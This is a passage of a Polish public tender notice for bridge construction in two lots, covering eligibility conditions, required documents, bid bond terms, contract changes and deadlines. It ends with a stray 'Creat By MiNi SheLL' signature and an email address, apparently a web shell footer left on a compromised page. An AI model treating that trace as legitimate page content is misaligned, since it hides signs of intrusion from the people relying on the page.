z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.3. uprawnień sytuacji ekonomicznej lub finansowej;<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający wymaga:<br/>aby Wykonawca posiadał opłaconą polisę, a przypadku jej braku innego dokumentu<br/>potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający uzna, że warunek<br/>został spełniony jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności na kwotę nie mniejszą niż<br/>750 000,00 PLN.<br/>6.1.4. zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1) Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie:<br/>a) Dla części 1:<br/>− co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie infrastruktury mostowej (drogowe obiekty inżynierskie - obiekty mostowe).<br/><br/>b) dla części 2:<br/>− co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie infrastruktury mostowej (drogowe obiekty inżynierskie - obiekty mostowe).<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą<br/>dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/>a) w części 1:<br/>− min. jedną osobą (która będzie pełnić funkcję kierownika budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności branży inżynieryjnej mostowej umożliwiają wykonywanie samodzielnych funkcji technicznych na budowach drogowych obiektów inżynierskich jako kierownik budowy lub inspektor nadzoru inwestorskiego lub odpowiadające im równoważne<br/>uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych.<br/><br/>b) w zakresie części 2:<br/>− min. jedną osobą (która będzie pełnić funkcję kierownika budowy) posiadającą uprawnienia<br/>budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności branży inżynieryjnej mostowej umożliwiają wykonywanie samodzielnych funkcji technicznych na budowach drogowych obiektów inżynierskich jako kierownik budowy lub inspektor nadzoru inwestorskiego lub odpowiadające im równoważne<br/>uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych.<br/><br/>Uwaga:<br/>1) Wykonawca powinien w wykazie robót wyraźnie określić zakres robót (rodzaj i długość sieci),<br/>aby można było ustalić, czy spełnia warunek udziału w postępowaniu.<br/>2) Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w<br/>realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w<br/>budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U.<br/>2020 r, poz. 1333 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne<br/>w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami<br/>regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.<br/>3) Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ<br/>może wskazać osobę będącą obywatelem państwa członkowskiego<br/>UE, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie,<br/>równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia<br/>22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r.<br/>poz. 1117).<br/>4) Zamawiający dopuszcza możliwość wskazania tej samej osoby do pełnienia funkcji<br/>kierownika branży drogowej - uprawnienia drogowe wykonawcze (dla warunku określonego w<br/>pkt 6.1.4. ppkt 2) lit. a) i b) SWZ), dla każdej z części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.2. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania)<br/>następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>8.2.1. W celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż<br/>w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy –w tym okresie, wraz<br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie<br/>uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego w<br/>pkt. 6.1.4. ppkt. 1) SWZ,<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego<br/>zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2)<br/>SWZ.<br/>c) Oryginał lub kopię opłaconej polisy, a przypadku jej braku innego dokumentu potwierdzającego, że<br/>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na<br/>kwotę nie mniejszą niż 750 000,00 PLN</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.4. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować<br/>dane wymagane dla oferty w SWZ<br/>i załącznikach).<br/>2) Oświadczenia, o których mowa w pkt 8.1 SWZ;<br/>3) Oświadczenie, o którym mowa w pkt 8.2 SWZ (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą<br/>odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika<br/>z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>a) dla części 1 - 4 500,00 PLN (słownie: cztery tysiące pięćset zł i 00/100),<br/>b) dla części 2 – 4 500,00 PLN (słownie: cztery tysiące pięćset zł i 00/100)<br/>12.2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>12.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>bankowy Zamawiającego:<br/>nr rachunku: 15 9183 1031 2003 3000 7139 0004<br/>z adnotacją „Wadium – Znak sprawy: DKP.271.02.2022 w części …… (podając numer części, której dotyczy wpłata)”<br/>12.4. Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie<br/>zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>12.5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem<br/>terminu składania ofert.<br/>12.6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub<br/>poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i<br/>powinna zawierać następujące elementy:<br/>a) nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego),<br/>gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b) kwotę wadium,<br/>c) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu<br/>na pierwsze żądanie zamawiającego w sytuacjach zatrzymania wadium określonych w<br/>przepisach ustawy.<br/>12.7. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>12.8. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy<br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają<br/>wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt.<br/>Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt.<br/>8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie<br/>warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych,<br/>strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z<br/>następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia<br/>niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu<br/>wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz<br/>akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia<br/>nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania<br/>robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót<br/>budowlanych, stanowiących przedmiot zamówienia przez organ administracji publicznej lub<br/>eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które<br/>Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia<br/>nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót<br/>budowlanych lub zakazano prowadzenie robót budowlanych,<br/>3) przedłużenia terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku zmiany umowy z wykonawcą robót, o których mowa<br/>w § 4 ust. 15, o ile zmiana ta uniemożliwi wykonanie przedmiotowej umowy w terminie<br/>wskazanym w § 2 ust. 1. Przedłużenie terminu może nastąpić wyłącznie o czas, przez jaki<br/>niemożliwe było prowadzenie robót ze względu na stwierdzoną kolizję,<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji<br/>projektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym<br/>przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na<br/>usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o<br/>liczbę dni niezbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji<br/>wymagać będzie przedłużenia terminu realizacji;<br/>5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian,<br/>powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot<br/>zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni<br/>niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia<br/>uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydania<br/>decyzji przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej zmian nie<br/>może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie,<br/>stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o którym<br/>mowa w § 3 ust. 1,<br/>6) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku wystąpienia warunków geologicznych lub hydrologicznych odmiennych od<br/>założonych w dokumentacji projektowej<br/>i powodujących konieczność wstrzymania robót lub konieczność ich wykonania przy<br/>wykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy czym<br/>przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania<br/>utrudnień związanych z ich wystąpieniem,<br/>Z uwagi na ograniczoną liczbę znaków formularza ogłoszenia, pozostała treść znajduje się w<br/>paragrafie 18 Umowy (załącznik nr 2 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com